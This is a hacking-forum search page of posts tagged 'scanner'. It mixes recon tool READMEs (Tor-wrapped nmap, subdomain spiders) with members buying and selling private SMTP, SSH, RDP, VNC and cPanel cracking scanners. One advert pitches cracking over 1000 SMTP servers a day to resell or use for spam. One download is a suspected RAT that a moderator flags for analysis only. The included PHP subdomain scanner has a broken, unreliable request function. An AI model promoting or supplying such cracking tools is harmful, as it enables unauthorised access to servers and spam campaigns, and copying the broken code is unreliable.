Jump to content

Search the Community

Showing results for tags 'scanner'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
    • Cryptocurrency
  • Cumparaturi online's Topics
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Cumparaturi online's Test
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Location


Interests


Biography


Location


Interests


Occupation

Found 41 results

  1. docker-onion-nmap

    Scan .onion hidden services with nmap using Tor, proxychains and dnsmasq in a minimal alpine Docker container. docker-onion-nmap Use nmap to scan hidden "onion" services on the Tor network. Minimal image based on alpine, using proxychains to wrap nmap. Tor and dnsmasq are run as daemons via s6, and proxychains wraps nmap to use the Tor SOCKS proxy on port 9050. Tor is also configured via DNSPort to anonymously resolve DNS requests to port 9053. dnsmasq is configured to with this localhost:9053 as an authority DNS server. Proxychains is configured to proxy DNS through the local resolver, so all DNS requests will go through Tor and applications can resolve .onion addresses. Example: $ docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion [tor_wait] Wait for Tor to boot... (might take a while) [tor_wait] Done. Tor booted. [nmap onion] nmap -p 80,443 facebookcorewwwi.onion [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:17 UTC [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK Nmap scan report for facebookcorewwwi.onion (224.0.0.1) Host is up (2.7s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 3.58 seconds How it works: When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command. Arguments: By default, args to docker run are passed to /bin/nmap which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com). For example, this: docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example: docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion and docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion will be executed as: proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion If you want to call any other command, including the original /usr/bin/nmap or /usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.: docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion Environment variables: There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted to connections to Tor while waiting for it to boot). Example: $ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion [tor_wait] Wait for Tor to boot... (might take a while) [tor_wait retry 0] Check socket is open on localhost:9050... [tor_wait retry 0] Socket OPEN on localhost:9050 [tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )... [tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again... [tor_wait retry 1] Check socket is open on localhost:9050... [tor_wait retry 1] Socket OPEN on localhost:9050 [tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )... [tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again... [tor_wait retry 2] Check socket is open on localhost:9050... [tor_wait retry 2] Socket OPEN on localhost:9050 [tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )... [tor_wait retry 2] SOCKS proxy UP on localhost:9050 [tor_wait] Done. Tor booted. [nmap onion] nmap -p 80,443 facebookcorewwwi.onion [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.12 Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:443 ... OK [proxychains] Dynamic chain ... 127.0.0.1:9050 ... facebookcorewwwi.onion:80 ... OK Nmap scan report for facebookcorewwwi.onion (224.0.0.1) Host is up (2.8s latency). PORT STATE SERVICE 80/tcp open http 443/tcp open https Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds Notes: No UDP available over Tor Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run "exec" to call commands like nmap gr33tz @jessfraz tor-proxy @zuazo alpine-tor-docker shellhacks crypto-rebels.de Download: docker-onion-nmap-master.zip or git clone https://github.com/milesrichardson/docker-onion-nmap.git Source
  2. Inventus Inventus is a spider designed to find subdomains of a specific domain by crawling it and any subdomains it discovers. It's a Scrapy spider, meaning it's easily modified and extendable to your needs. Demo https://asciinema.org/a/PGIeEpEwZTUdgxrolBpCjljHL# Requirements Linux -- I haven't tested this on Windows. Python 2.7 or Python 3.3+ Scrapy 1.4.0 or above. Installation Inventus requires Scrapy to be installed before it can be run. Firstly, clone the repo and enter it. $ git clone https://github.com/nmalcolm/Inventus $ cd Inventus Now install the required dependencies using pip. $ pip install -r requirements.txt Assuming the installation succeeded, Inventus should be ready to use. Usage The most basic usage of Inventus is as follows: $ cd Inventus $ scrapy crawl inventus -a domain=facebook.com This tells Scrapy which spider to use ("inventus" in this case), and passes the domain to the spider. Any subdomains found will be sent to STDOUT. The other custom parameter is subdomain_limit. This sets a max limit of subdomains to discover before quitting. The default value is 10000, but isn't a hard limit. $ scrapy crawl inventus -a domain=facebook.com -a subdomain_limit=100 Exporting Exporting data can be done in multiple ways. The easiest way is redirecting STDOUT to a file. $ scrapy crawl inventus -a domain=facebook.com > facebook.txt Scrapy has a built-in feature which allows you to export items into various formats, including CSV, JSON, and XML. Currently only subdomains will be exported, however this may change in the future. $ scrapy crawl inventus -a domain=facebook.com -t csv -o Facebook.csv Configuration Configurations can be made to how Inventus behaves. By default Inventus will ignore robots.txt, has a 30 second timeout, caches crawl data for 24 hours, has a crawl depth of 5, and uses Scrapy's AutoThrottle extension. These and more can all be changed by editing the inventus_spider/settings.py file. Scrapy's settings are well documented too. Bugs/Suggestions/Feedback Feel free to open a new issue for any of the above. Inventus was built in only a few hours and will likely contain bugs. You can also connect with me on Twitter. License Released under the MIT License. See LICENSE. Download: Inventus-master.zip or git clone https://github.com/nmalcolm/Inventus.git Source
  3. arhive

    cine ma poate ajuta cu cateva scanere?
  4. cpanel scanner

    care e cel mai bun cpanel scanner?
  5. THIS IS THE FASTEST AND THE BEST SMTP SCANNER AVAILABLE ANYWHERE ON THE INTERNET -> Easily Crack 1000+ HQ SMTP's A Day (Scanning Server should have enough power) -> You can sell those smtp's for upto 10-15$ a piece -> You can use those smtp's to send CPA offer Emails and earn good $$ -> Practically Use these smtp's for anything you want. -> It also Simultaneously Scans for SSH and RDP's (Bonus Feature) -> You can use 10,000+ Threads (Only limited by server config) -> Runs on most linux based OS. Technical Specs (Features) Some Screenshots - Usage Instructions - Auto Config File[with this script you do not need to specify every parameter again. just run like - "./auto 65" where 65 is ip range] - Scanner working - Sample Output Log - Pricing - 150$ BTC If you want to see it live in action then add me on skype - // Removed [only interested buyers] HMU with any queries you may have.
  6. indrumare scanare vnc / rdp

    Buna ! Ma poate ajuta si pe mine cineva cum pot scana ? Multumesc.
  7. Vulnerability scanner for Linux, agentless, written in golang. https://github.com/future-architect/vuls
  8. Cumpar Socks 4/5 scanner (private made) sa fie facut in python, sa scaneze pe ip range sau ip class , exclus port 1080, 80 .. Astept oferte pe privat. Copiii/new user sa se abtina, nu fac nici un deal decat cu useri cu reputatie. Multumesc
  9. ReFUDme Scanner

    https://www.sendspace.com/file/kogvti
  10. Scanner

    Salut,tocmai mi-am luat un root si am observat ca nu e chiar asa de bun la floodat,si mam gandit sa il fac ca scanner,dar na nu am scanner..:)Am folosit unixcod nu prea il inteleg,cine stie unu mai bun||? Multumesc
  11. SMTP Scanner

    Am gasit un scanner de smtp-uri de linux si m-am gandit sa il postez , nu stiu cum functioneaza am vazut ca ia smtp-uri si din email si din ip .... poate ma lamuriti si pe mine Fastupload.ro - transfer rapid de fi?iere online
  12. Ssh Scanner

    Download https://mega.co.nz/#!gR5R0IyL!UPdmJoMBPt0i3G58AZDYPa7sk7isFhQ8c77DinvZwwI
  13. Scanner ssh22 ;)

    Salutare, mai jos va dau un scanner de ssh22. E vechi, dar inca-si face treaba explorer.eu5.org/scanner.jpg Scuze nu mai era activ ftp-ul
  14. MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches. Changes: Added support for filter_wrapup callback. Various bug fixes, a typo fixed, and all perl function prototypes removed. Download Site: MIMEDefang | MIMEDefang
  15. C# WPF TCP port scanner

    Pentru c? acum câteva zile am avut nevoie s?... scanez un ip pentru port-uri deschise, ?i pentru c? n-am dorit s? folosesc uneltele disponibile deja online, m-am „jucat” un pic. ?i pentru c? „sharing is good”, postez programul ?i codul surs? pentru oricine are nevoie de un scanner TCP multithreaded. Executabilul compilat poate fi desc?rcat aici. Codul surs? (proiect Visual Studio 2013) poate fi desc?rcat aici. Enjoy!
  16. SubDomain Scanner v1.0

    <?php /* Bing SubDomain Scanner By injector_ma */ error_reporting(0); set_time_limit(0); if (!function_exists ("curl_exec")) die ("Fatal Error : cURL Extension is not Installed...\n"); $domain = $argv[1]; echo" _________ ___. .___ .__ / _____/__ _\_ |__ __| _/____ _____ _____ |__| ____ ______ \_____ \| | \ __ \ / __ |/ _ \ / \\__ \ | |/ \ / ___/ / \ | / \_\ \/ /_/ ( <_> ) Y Y \/ __ \| | | \\___ \ /_______ /____/|___ /\____ |\____/|__|_| (____ /__|___| /____ > \/ \/ \/ \/ \/ \/ \/ \n"; if(count(Bingsub ($domain)) == 0){ $subs = array( "app","apps","cpanel","ftp","mail","mysql","webmail","smtp","pop","pop3","direct-connect", "direct-connect-mail","record","ssl","dns","help","blog","forum","doc","home","shop", "vb","www","web","webadmin","weblog","webmail","webmaster","webservices","webserver", "log","logs","images","lab","ftpd","docs","download","downloads","about","backup", "chat","data","smtp","upload","uploads","ns1","ns2","record","ssl","imap","result", "vip","demo","beta","video" ); echo"\n\t\tNothing Found. Start Using Brute Force Methode ...\n\n"; foreach($subs as $sub){ $Check = @fsockopen("$sub.$domain", 80); if($Check){ echo "$sub.$domain : ".gethostbyname("$sub.$domain")." \n\n"; $save = fopen('subdomains.txt','ab'); fwrite($save,"http://$sub.$domain\r\n"); fclose($save); } } }else{ foreach(Bingsub ($domain) as $sub){ echo $sub." : "; echo gethostbyname($sub)."\r\n"; $save = fopen('subdomains.txt','ab'); fwrite($save,"http://".$sub."\r\n"); fclose($save); } } function Bingsub ($domain) { for($i = 1; $i <= 1000; $i += 10){ $gt = curlreq("http://www.bing.com/search?q=".urlencode("domain:$domain")."&first=$i","msnbot/1.0 (+http://search.msn.com/msnbot.htm)"); $searchme = '#<h2><a href="(.*?)"#i'; if (preg_match_all ($searchme, $gt, $matches)){ foreach ($matches[1] as $matches){ $urls[] = cleanme ($matches); } } if(!preg_match('#class="sb_pagN"#',$gt)) break; } if(!empty($urls) && is_array($urls)){ return array_unique($urls); } } function cleanme ($link){ return str_replace("www.","",parse_url($link, PHP_URL_HOST)); } function curlreq($url, $user_agent, $proxy = FALSE, $post = FALSE) { $ch = @curl_close($ch); return $source; } Sursa
  17. SSH GOSH SCANNER

    SSH GOSH SCANNER ! l-am gasit pe un vps nu stiu nimic de el ! GOSH
  18. Scanner nologin

    Caut un scanner pentru nologin astept oferte !
  19. Cumpar Scanner Rdp !

    Cumpar Scanner Rdp linux sau windows sa fie bun cat de cat macar sa prinda 20-30 rdp-uri bune pe zi ! add : cryptbymme !
  20. Google on Thursday unleashed its own free web application vulnerability scanner tool, which the search engine giant calls Google Cloud Security Scanner, that will potentially scan developers' applications for common security vulnerabilities on its cloud platform more effectively. SCANNER ADDRESSES TWO MAJOR WEB VULNERABILITIES Google launched the Google Cloud Security Scanner in beta. The New web application vulnerability scanner allows App Engine developers to regularly scan their applications for two common web application vulnerabilities: Cross-Site Scripting (XSS) Mixed Content Scripts Despite several free web application vulnerability scanner and vulnerability assessment tools are available in the market, Google says these website vulnerability scanners are typically hard to set up and "built for security professionals," not for web application developers that run the apps on the Google App Engine. While Google Cloud Security Scanner will be easier for web application developers to use. This web application vulnerability scanner easily scans for Cross-Site Scripting (XSS) and mixed content scripts flaws, which the company argues are the most common security vulnerabilities Google App Engine developers face. Today, common HTML5 and JavaScript-heavy applications are more challenging to crawl and test, and Google Cloud Security Scanner claims to take a novel approach by parsing the code and then executing a full-page render to find more complex areas of a developer's site. GO FOR WEB VULNERABILITY SCAN NOW The developers can access the Cloud Security Scanner under Compute > App Engine > Security in Google's Developers Console. This will run your first scan. It does not work with App Engine Managed VMs, Google Compute Engine, or other resources. Google notes that there are two typical approaches to such security scans: Parse the HTML and emulate a browser – This is fast; however, it comes at the cost of missing site actions that require a full DOM or complex JavaScript operations. Use a real browser – This approach avoids the parser coverage gap and most closely simulates the site experience. However, it can be slow due to event firing, dynamic execution, and time needed for the DOM to settle. Security Engineering head Rob Mann says that their web vulnerability scanner uses Google Compute Engine to dynamically create a botnet of hundreds of virtual Chrome workers that scan at a max rate of 20 requests per second, so that the target sites won’t be overloaded. The search engine giant still recommended developers to look into manual security review by a web app security professional, just to be on the safer side. However, the company hopes its vulnerability scanner tool will definitely provide a simple solution to the most common App Engine issues with minimal false positives. Source
  21. Vand scannere private - Scanner Cpanel - Pret 90$ - Scanner SMTP - Pret 50$ - Scanner VNC - Pret 30$ Plata PerfectMoney, WMZ sau cod de reincarcare
  22. Smtp scanner linux

    Smtp scanner linux https://www.sendspace.com/file/849qex Asta sa nu ziceti ca doar cer si nu ofer .
  23. salut

    stiu ca nam inca cele 10 posturi , dar nici nu vreau sa le fac asa de dragul de a fii cum fac alti ca sa aibe posturi multe... ma intereseaza un smtp scanner , sau ce alta metoda mai este ide folosit in loc de smtp
  24. [align=center]SCAN RAT V2.2 As the title says , i am sharing with you an amazing AIO software , developped by FudMario ( all credits go to him )dedicated to scan your system to detect and delete any malwares , with many features and options ... I found this software on another forum and after on test i find it absolutely usefull and really HQ , here is some pictures of this software : Don't worry guys if you saw spanish language on the screenshots, the vesrion posted here is available in english and spanish Here is what the differents tabs are : -Principal : here you will get all your system informations , also the coder's contacts .. -Scanner : here , you will be able to lauch a complete scan to detect if any malwares is running on your system -Process Viewer : here you will have a complete list of the running processes , no need to open your task manager anymore -Start up : you will be able to detect all the applications laucnhed with windows so if a start up is on your system you will be able to find it and analyse it -Event viewer :to check every event or incident on your system -USB cleaner : this feature will allow you to scan and clean all USB devices to guarantee a perfect security of your system -Lock Folder : will allow you to lock/unlock any folder on your system Here is now some scan of the software : https://www.metascan-online.com/en/scanresult/file/815d0d8a9c2c447fa21bd1b681b76204 https://anubis.iseclab.org/?action=result&task_id=17a219a5724f70bb4bd4c48798e43776a&format=html Download Scan-RAT v2.2 : hxxps://www.sendspace.com/file/39ptx0 Credits : all credits of this software go to FudMario who offer us a great AIO software , thanks to him [/align] //usr6 Descarcati doar pentru analiza https://malwr.com/analysis/MTk0OGZmNDEwOTAwNDcwZGExYTQ0MDA1MzA4ZjJhYzM/
×